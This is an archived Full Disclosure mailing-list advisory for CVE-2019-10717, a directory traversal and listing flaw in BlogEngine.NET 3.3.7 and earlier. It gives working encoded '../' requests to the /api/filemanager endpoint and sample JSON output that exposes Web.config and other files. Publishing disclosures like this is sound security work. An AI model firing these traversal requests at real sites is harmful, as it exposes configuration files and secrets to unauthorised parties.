[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing
- From: aaron bishop <abishop@xxxxxxxxx>
- Date: Mon, 24 Jun 2019 17:42:26 -0600
*CVE-2019-10717* - A Directory Traversal + Directory Listing exists on
BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the
/api/filemanager endpoint. A request such as:
https://$HOST/api/filemanager?path=*%2F..%2f..%2f*
Discloses the contents of the application root:
....
{
"IsChecked": false,
"SortOrder": 25,
"Created": "5/26/2018 1:53:02 PM",
"Name": "Web.config",
"FileSize": "19.41 kb",
"FileType": 1,
"FullPath": "/../../Web.config",
"ImgPlaceholder": "fa fa-file-o"
},
....
The contents of additional directories can be viewed by modifying the path:
https://$HOST/api/filemanager?path=*%2F..%2f..%2fContent*
...
{
"IsChecked": false,
"SortOrder": 15,
"Created": "3/30/2019 9:09:23 PM",
"Name": "toastr.scss",
"FileSize": "6.92 kb",
"FileType": 1,
"FullPath": "/../../Content/toastr.scss",
"ImgPlaceholder": "fa fa-file-o"
}
...
Disclosure:
https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/